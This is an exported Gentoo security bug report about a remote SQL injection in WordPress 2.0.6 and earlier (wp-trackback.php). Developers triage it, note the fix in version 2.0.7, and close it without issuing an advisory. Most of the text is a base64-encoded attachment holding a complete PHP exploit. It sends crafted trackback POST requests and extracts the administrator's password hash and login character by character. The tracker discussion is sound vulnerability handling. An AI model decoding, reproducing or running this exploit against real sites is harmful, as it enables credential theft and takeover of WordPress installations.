161278 2007-01-10 05:55 0000 www-apps/wordpress (versions <= 2.0.6) wp-trackback.php Remote SQL Injection 2007-01-22 16:56:24 0000 1 1 1 Unclassified Gentoo Security Vulnerabilities unspecified All Linux RESOLVED FIXED http://www.milw0rm.com/exploits/3109 C3 [noglsa] P2 minor --- 1 keith@email.arizona.edu security@gentoo.org bathym@0x656d67.org linuxnoob@wi.rr.com web-apps@gentoo.org keith@email.arizona.edu 2007-01-10 05:55:01 0000 http://www.milw0rm.com/exploits/3109 Reproducible: Didn't try bathym@0x656d67.org 2007-01-10 07:19:49 0000 millw0rm is down, see this advisory POC: http://www.securityfocus.com/archive/1/455927 bathym@0x656d67.org 2007-01-10 07:36:48 0000 Created an attachment (id=106318) www-apps/wordpress (versions <= 2.0.6) wp-trackback.php Remote SQL Injection exploit the first past is wrong, I'm sorry. this attach contain milw0rm exploit about wp-trackback.php Remote SQL Injection. vorlon@gentoo.org 2007-01-16 14:23:39 0000 fixed in 2.0.7 it seems: http://wordpress.org/development/2007/01/wordpress-207/ web-apps, pls update vorlon@gentoo.org 2007-01-16 14:29:06 0000 *** Bug 162302 has been marked as a duplicate of this bug. *** beandog@gentoo.org 2007-01-17 03:53:22 0000 2.0.7 in CVS falco@gentoo.org 2007-01-17 22:31:11 0000 Security team please vote. the exploit comments say: "(needs register_globals=on, 4 <= PHP < 4.4.3,< 5.1.4)" ---> trash i vote No. vorlon@gentoo.org 2007-01-22 16:56:24 0000 agreed, closing from wordpress.org: Here are the changes that have been made since 2.0.6: * Security fix for wp_unregister_GLOBALS() to work around the zend_hash_del_key_or_index bug in PHP 4 versions less than 4.4.3 and PHP 5 versions less than 5.1.4 with register_globals set to “On.” [...] 106318 2007-01-10 07:36 0000 www-apps/wordpress (versions <= 2.0.6) wp-trackback.php Remote SQL Injection exploit wordpress_exploit.php text/plain PD9waHAKcHJpbnRfcignCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpXb3JkcHJlc3MgPD0gMi4wLjYgd3At dHJhY2tiYWNrLnBocCBaZW5kX0hhc2hfRGVsX0tleV9Pcl9JbmRleCAvCi8gc3FsIGluamVjdGlv biBhZG1pbiBoYXNoIGRpc2Nsb3N1cmUgZXhwbG9pdAoobmVlZHMgcmVnaXN0ZXJfZ2xvYmFscz1v biwgNCA8PSBQSFAgPCA0LjQuMyw8IDUuMS40KQpieSByZ29kCmRvcms6ICJpcyBwcm91ZGx5IHBv d2VyZWQgYnkgV29yZFByZXNzIgptYWlsOiByZXRyb2cgYXQgYWxpY2UgZG90IGl0CnNpdGU6IGh0 dHA6Ly9yZXRyb2dvZC5hbHRlcnZpc3RhLm9yZwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJyk7CgppZiAo JGFyZ2M8MykgewogICAgcHJpbnRfcignCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpVc2FnZTogcGhwICcu JGFyZ3ZbMF0uJyBob3N0IHBhdGggT1BUSU9OUwpob3N0OiAgICAgIHRhcmdldCBzZXJ2ZXIgKGlw L2hvc3RuYW1lKQpwYXRoOiAgICAgIHBhdGggdG8gd29yZHByZXNzCk9wdGlvbnM6CiAtcFtwb3J0 XTogICAgc3BlY2lmeSBhIHBvcnQgb3RoZXIgdGhhbiA4MAogLVBbaXA6cG9ydF06IHNwZWNpZnkg YSBwcm94eQogLXRbcHJlZml4XTogIHNwZWNpZnkgYSB0YWJsZSBwcmVmaXggKGRlZmF1bHQ6IHdw XykKRXhhbXBsZToKcGhwICcuJGFyZ3ZbMF0uJyBsb2NhbGhvc3QgL3dvcmRwcmVzcy8gLVAxLjEu MS4xOjgwCnBocCAnLiRhcmd2WzBdLicgbG9jYWxob3N0IC8gLXA4MQotLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0KJyk7CiAgICBkaWU7Cn0KZXJyb3JfcmVwb3J0aW5nKDApOwppbmlfc2V0KCJtYXhfZXhlY3V0 aW9uX3RpbWUiLDApOwppbmlfc2V0KCJkZWZhdWx0X3NvY2tldF90aW1lb3V0Iiw1KTsKCmZ1bmN0 aW9uIHF1aWNrX2R1bXAoJHN0cmluZykKewogICRyZXN1bHQ9Jyc7JGV4YT0nJzskY29udD0wOwog IGZvciAoJGk9MDsgJGk8PXN0cmxlbigkc3RyaW5nKS0xOyAkaSsrKQogIHsKICAgaWYgKChvcmQo JHN0cmluZ1skaV0pIDw9IDMyICkgfCAob3JkKCRzdHJpbmdbJGldKSA+IDEyNiApKQogICB7JHJl c3VsdC49IiAgLiI7fQogICBlbHNlCiAgIHskcmVzdWx0Lj0iICAiLiRzdHJpbmdbJGldO30KICAg aWYgKHN0cmxlbihkZWNoZXgob3JkKCRzdHJpbmdbJGldKSkpPT0yKQogICB7JGV4YS49IiAiLmRl Y2hleChvcmQoJHN0cmluZ1skaV0pKTt9CiAgIGVsc2UKICAgeyRleGEuPSIgMCIuZGVjaGV4KG9y ZCgkc3RyaW5nWyRpXSkpO30KICAgJGNvbnQrKztpZiAoJGNvbnQ9PTE1KSB7JGNvbnQ9MDsgJHJl c3VsdC49IlxyXG4iOyAkZXhhLj0iXHJcbiI7fQogIH0KIHJldHVybiAkZXhhLiJcclxuIi4kcmVz dWx0Owp9CiRwcm94eV9yZWdleCA9ICcoXGJcZHsxLDN9XC5cZHsxLDN9XC5cZHsxLDN9XC5cZHsx LDN9XDpcZHsxLDV9XGIpJzsKCmZ1bmN0aW9uIHNlbmRwYWNrZXRpaSgkcGFja2V0KQp7CiAgZ2xv YmFsICRwcm94eSwgJGhvc3QsICRwb3J0LCAkaHRtbCwgJHByb3h5X3JlZ2V4OwogIGlmICgkcHJv eHk9PScnKSB7CiAgICAkb2NrPWZzb2Nrb3BlbihnZXRob3N0YnluYW1lKCRob3N0KSwkcG9ydCk7 CiAgICBpZiAoISRvY2spIHsKICAgICAgZWNobyAnTm8gcmVzcG9uc2UgZnJvbSAnLiRob3N0Lic6 Jy4kcG9ydDsgZGllOwogICAgfQogIH0KICBlbHNlIHsKCSRjID0gcHJlZ19tYXRjaCgkcHJveHlf cmVnZXgsJHByb3h5KTsKICAgIGlmICghJGMpIHsKICAgICAgZWNobyAnTm90IGEgdmFsaWQgcHJv eHkuLi4nO2RpZTsKICAgIH0KICAgICRwYXJ0cz1leHBsb2RlKCc6JywkcHJveHkpOwogICAgZWNo byAiQ29ubmVjdGluZyB0byAiLiRwYXJ0c1swXS4iOiIuJHBhcnRzWzFdLiIgcHJveHkuLi5cclxu IjsKICAgICRvY2s9ZnNvY2tvcGVuKCRwYXJ0c1swXSwkcGFydHNbMV0pOwogICAgaWYgKCEkb2Nr KSB7CiAgICAgIGVjaG8gJ05vIHJlc3BvbnNlIGZyb20gcHJveHkuLi4nO2RpZTsKCX0KICB9CiAg ZnB1dHMoJG9jaywkcGFja2V0KTsKICBpZiAoJHByb3h5PT0nJykgewogICAgJGh0bWw9Jyc7CiAg ICB3aGlsZSAoIWZlb2YoJG9jaykpIHsKICAgICAgJGh0bWwuPWZnZXRzKCRvY2spOwogICAgfQog IH0KICBlbHNlIHsKICAgICRodG1sPScnOwogICAgd2hpbGUgKCghZmVvZigkb2NrKSkgb3IgKCFl cmVnaShjaHIoMHgwZCkuY2hyKDB4MGEpLmNocigweDBkKS5jaHIoMHgwYSksJGh0bWwpKSkgewog ICAgICAkaHRtbC49ZnJlYWQoJG9jaywxKTsKICAgIH0KICB9CiAgZmNsb3NlKCRvY2spOwp9Cgok aG9zdD0kYXJndlsxXTsKJHBhdGg9JGFyZ3ZbMl07CiRwb3J0PTgwOwokcHJveHk9IiI7CiRwcmVm aXg9IndwXyI7Cgpmb3IgKCRpPTM7ICRpPCRhcmdjOyAkaSsrKXsKJHRlbXA9JGFyZ3ZbJGldWzBd LiRhcmd2WyRpXVsxXTsKaWYgKCR0ZW1wPT0iLXAiKQp7CiAgJHBvcnQ9c3RyX3JlcGxhY2UoIi1w IiwiIiwkYXJndlskaV0pOwp9CmlmICgkdGVtcD09Ii1QIikKewogICRwcm94eT1zdHJfcmVwbGFj ZSgiLVAiLCIiLCRhcmd2WyRpXSk7Cn0KaWYgKCR0ZW1wPT0iLXQiKQp7CiAgJHByZWZpeD1zdHJf cmVwbGFjZSgiLXQiLCIiLCRhcmd2WyRpXSk7Cn0KfQppZiAoKCRwYXRoWzBdPD4nLycpIG9yICgk cGF0aFtzdHJsZW4oJHBhdGgpLTFdPD4nLycpKSB7ZWNobyAnRXJyb3IuLi4gY2hlY2sgdGhlIHBh dGghJzsgZGllO30KaWYgKCRwcm94eT09JycpIHskcD0kcGF0aDt9IGVsc2UgeyRwPSdodHRwOi8v Jy4kaG9zdC4nOicuJHBvcnQuJHBhdGg7fQoKJGNoYXJzWzBdPTA7Ly9udWxsCiRjaGFycz1hcnJh eV9tZXJnZSgkY2hhcnMscmFuZ2UoNDgsNTcpKTsgLy9udW1iZXJzCiRjaGFycz1hcnJheV9tZXJn ZSgkY2hhcnMscmFuZ2UoOTcsMTAyKSk7Ly9hLWYgbGV0dGVycwoKZnVuY3Rpb24gbXlfZW5jb2Rl KCRteV9zdHJpbmcpCnsKICAkZW5jb2RlZD0iQ0hBUigiOwogIGZvciAoJGs9MDsgJGs8PXN0cmxl bigkbXlfc3RyaW5nKS0xOyAkaysrKQogIHsKICAgICRlbmNvZGVkLj1vcmQoJG15X3N0cmluZ1sk a10pOwogICAgaWYgKCRrPT1zdHJsZW4oJG15X3N0cmluZyktMSkgeyRlbmNvZGVkLj0iKSI7fQog ICAgZWxzZSB7JGVuY29kZWQuPSIsIjt9CiAgfQogIHJldHVybiAkZW5jb2RlZDsKfQoKZWNobyAi XG5wd2QgaGFzaCAgIC0+ICI7CiRqPTE7JHBhc3N3b3JkPSIiOwp3aGlsZSAoIXN0cnN0cigkcGFz c3dvcmQsY2hyKDApKSkKewogICAgZm9yICgkaT0wOyAkaTw9MjU1OyAkaSsrKQogICAgewogICAg ICAgIGlmIChpbl9hcnJheSgkaSwkY2hhcnMpKQogICAgICAgIHsKCQkgIAokc3FsPSI5OTk5OTkv KiovVU5JT04vKiovU0VMRUNULyoqLyhJRigoQVNDSUkoU1VCU1RSSU5HKHVzZXJfcGFzcywiLiRq LiIsMSkpPSIuJGkuIiksIi5teV9lbmNvZGUoIm9wZW4iKS4iLCIubXlfZW5jb2RlKCJzdW4tdHp1 IikuIikpLyoqL0ZST00vKiovIi4kcHJlZml4LiJ1c2Vycy8qKi9XSEVSRS8qKi9JRD0xLyoiOwog ICAgICAgICAgJGRhdGEgPSItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTdkNjFiY2QxZjAz M2VcclxuIjsKICAgICAgICAgICRkYXRhLj0iQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRh OyBuYW1lPVwidGl0bGVcIjtcclxuXHJcbiI7CiAgICAgICAgICAkZGF0YS49IjFcclxuIjsKICAg ICAgICAgICRkYXRhLj0iLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS03ZDYxYmNkMWYwMzNl XHJcbiI7CiAgICAgICAgICAkZGF0YS49IkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsg bmFtZT1cInVybFwiO1xyXG5cclxuIjsKICAgICAgICAgICRkYXRhLj0iMVxyXG4iOwogICAgICAg ICAgJGRhdGEuPSItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTdkNjFiY2QxZjAzM2Vcclxu IjsKICAgICAgICAgICRkYXRhLj0iQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1l PVwiYmxvZ19uYW1lXCI7XHJcblxyXG4iOwogICAgICAgICAgJGRhdGEuPSIxXHJcbiI7CiAgICAg ICAgICAkZGF0YS49Ii0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2Q2MWJjZDFmMDMzZVxy XG4iOwogICAgICAgICAgJGRhdGEuPSJDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5h bWU9XCJ0Yl9pZFwiO1xyXG5cclxuIjsKICAgICAgICAgICRkYXRhLj0iJHNxbFxyXG4iOwogICAg ICAgICAgJGRhdGEuPSItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTdkNjFiY2QxZjAzM2Vc clxuIjsKICAgICAgICAgICRkYXRhLj0iQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBu YW1lPVwiMTc0MDAwOTM3N1wiO1xyXG5cclxuIjsKICAgICAgICAgICRkYXRhLj0iMVxyXG4iOwog ICAgICAgICAgJGRhdGEuPSItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTdkNjFiY2QxZjAz M2VcclxuIjsKICAgICAgICAgICRkYXRhLj0iQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRh OyBuYW1lPVwiNDk2NTQ2NDcxXCI7XHJcblxyXG4iOwogICAgICAgICAgJGRhdGEuPSIxXHJcbiI7 CiAgICAgICAgICAkZGF0YS49Ii0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2Q2MWJjZDFm MDMzZS0tXHJcbiI7CiAgICAgICAgICAkcGFja2V0ID0iUE9TVCAiLiRwLiJ3cC10cmFja2JhY2su cGhwP3RiX2lkPTEgSFRUUC8xLjBcclxuIjsKICAgICAgICAgICRwYWNrZXQuPSJDb250ZW50LVR5 cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLTdkNjFiY2QxZjAzM2VcclxuIjsKICAgICAgICAgICRwYWNrZXQuPSJIb3N0OiAiLiRob3N0 LiJcclxuIjsKICAgICAgICAgICRwYWNrZXQuPSJDb250ZW50LUxlbmd0aDogIi5zdHJsZW4oJGRh dGEpLiJcclxuIjsKICAgICAgICAgICRwYWNrZXQuPSJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxu IjsKICAgICAgICAgICRwYWNrZXQuPSRkYXRhOwogICAgICAgICAgc2VuZHBhY2tldGlpKCRwYWNr ZXQpOwogICAgICAgICAgaWYgKCFlcmVnaSgidHJhY2tiYWNrcyBhcmUgY2xvc2VkIiwkaHRtbCkp IHskcGFzc3dvcmQuPWNocigkaSk7ZWNobyBjaHIoJGkpO3NsZWVwKDEpO2JyZWFrO30KICAgICAg ICB9CiAgICAgICAgaWYgKCRpPT0yNTUpIHsKICAgICAgICAgICAgZGllKCJcbkV4cGxvaXQgZmFp bGVkLi4uIik7CiAgICAgICAgfQogICAgfQokaisrOwp9CmVjaG8gIlxuIjsKCmVjaG8gImFkbWlu IHVzZXIgLT4gIjsKJGo9MTskYWRtaW49IiI7CndoaWxlICghc3Ryc3RyKCRhZG1pbixjaHIoMCkp KQp7CiAgICBmb3IgKCRpPTA7ICRpPD0yNTU7ICRpKyspCiAgICB7CiAgICAgICAgICAKJHNxbD0i OTk5OTk5LyoqL1VOSU9OLyoqL1NFTEVDVC8qKi8oSUYoKEFTQ0lJKFNVQlNUUklORyh1c2VyX2xv Z2luLCIuJGouIiwxKSk9Ii4kaS4iKSwiLm15X2VuY29kZSgib3BlbiIpLiIsIi5teV9lbmNvZGUo InN1bi10enUiKS4iKSkvKiovRlJPTS8qKi8iLiRwcmVmaXguInVzZXJzLyoqL1dIRVJFLyoqL0lE PTEvKiI7CiAgICAgICAgICAkZGF0YSA9Ii0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2Q2 MWJjZDFmMDMzZVxyXG4iOwogICAgICAgICAgJGRhdGEuPSJDb250ZW50LURpc3Bvc2l0aW9uOiBm b3JtLWRhdGE7IG5hbWU9XCJ0aXRsZVwiO1xyXG5cclxuIjsKICAgICAgICAgICRkYXRhLj0iMVxy XG4iOwogICAgICAgICAgJGRhdGEuPSItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTdkNjFi Y2QxZjAzM2VcclxuIjsKICAgICAgICAgICRkYXRhLj0iQ29udGVudC1EaXNwb3NpdGlvbjogZm9y bS1kYXRhOyBuYW1lPVwidXJsXCI7XHJcblxyXG4iOwogICAgICAgICAgJGRhdGEuPSIxXHJcbiI7 CiAgICAgICAgICAkZGF0YS49Ii0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2Q2MWJjZDFm MDMzZVxyXG4iOwogICAgICAgICAgJGRhdGEuPSJDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRh dGE7IG5hbWU9XCJibG9nX25hbWVcIjtcclxuXHJcbiI7CiAgICAgICAgICAkZGF0YS49IjFcclxu IjsKICAgICAgICAgICRkYXRhLj0iLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS03ZDYxYmNk MWYwMzNlXHJcbiI7CiAgICAgICAgICAkZGF0YS49IkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0t ZGF0YTsgbmFtZT1cInRiX2lkXCI7XHJcblxyXG4iOwogICAgICAgICAgJGRhdGEuPSIkc3FsXHJc biI7CiAgICAgICAgICAkZGF0YS49Ii0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2Q2MWJj ZDFmMDMzZVxyXG4iOwogICAgICAgICAgJGRhdGEuPSJDb250ZW50LURpc3Bvc2l0aW9uOiBmb3Jt LWRhdGE7IG5hbWU9XCIxNzQwMDA5Mzc3XCI7XHJcblxyXG4iOwogICAgICAgICAgJGRhdGEuPSIx XHJcbiI7CiAgICAgICAgICAkZGF0YS49Ii0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2Q2 MWJjZDFmMDMzZVxyXG4iOwogICAgICAgICAgJGRhdGEuPSJDb250ZW50LURpc3Bvc2l0aW9uOiBm b3JtLWRhdGE7IG5hbWU9XCI0OTY1NDY0NzFcIjtcclxuXHJcbiI7CiAgICAgICAgICAkZGF0YS49 IjFcclxuIjsKICAgICAgICAgICRkYXRhLj0iLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS03 ZDYxYmNkMWYwMzNlLS1cclxuIjsKICAgICAgICAgICRwYWNrZXQgPSJQT1NUICIuJHAuIndwLXRy YWNrYmFjay5waHA/dGJfaWQ9MSBIVFRQLzEuMFxyXG4iOwogICAgICAgICAgJHBhY2tldC49IkNv bnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tN2Q2MWJjZDFmMDMzZVxyXG4iOwogICAgICAgICAgJHBhY2tldC49Ikhvc3Q6 ICIuJGhvc3QuIlxyXG4iOwogICAgICAgICAgJHBhY2tldC49IkNvbnRlbnQtTGVuZ3RoOiAiLnN0 cmxlbigkZGF0YSkuIlxyXG4iOwogICAgICAgICAgJHBhY2tldC49IkNvbm5lY3Rpb246IENsb3Nl XHJcblxyXG4iOwogICAgICAgICAgJHBhY2tldC49JGRhdGE7CiAgICAgICAgICBzZW5kcGFja2V0 aWkoJHBhY2tldCk7CiAgICAgICAgICBpZiAoIWVyZWdpKCJ0cmFja2JhY2tzIGFyZSBjbG9zZWQi LCRodG1sKSkgeyRhZG1pbi49Y2hyKCRpKTtlY2hvIGNocigkaSk7c2xlZXAoMSk7YnJlYWs7fQog ICAgICAgIGlmICgkaT09MjU1KSB7CiAgICAgICAgICAgIGRpZSgiXG5FeHBsb2l0IGZhaWxlZC4u LiIpOwogICAgICAgIH0KICAgIH0KJGorKzsKfQplY2hvICJcbiI7CgpmdW5jdGlvbiBpc19oYXNo KCRoYXNoKQp7CiBpZiAoZXJlZygiKFthLWYwLTldezMyfSkiLHRyaW0oJGhhc2gpKSkge3JldHVy biB0cnVlO30KIGVsc2Uge3JldHVybiBmYWxzZTt9Cn0KCmlmIChpc19oYXNoKCRwYXNzd29yZCkp IHsKICBlY2hvICJleHBsb2l0IHN1Y2NlZWRlZC4uLiI7Cn0KZWxzZSB7CiAgZWNobyAiZXhwbG9p dCBmYWlsZWQuLi4iOwogIH0KCj8+CgojIG1pbHcwcm0uY29tIFsyMDA3LTAxLTEwXQo=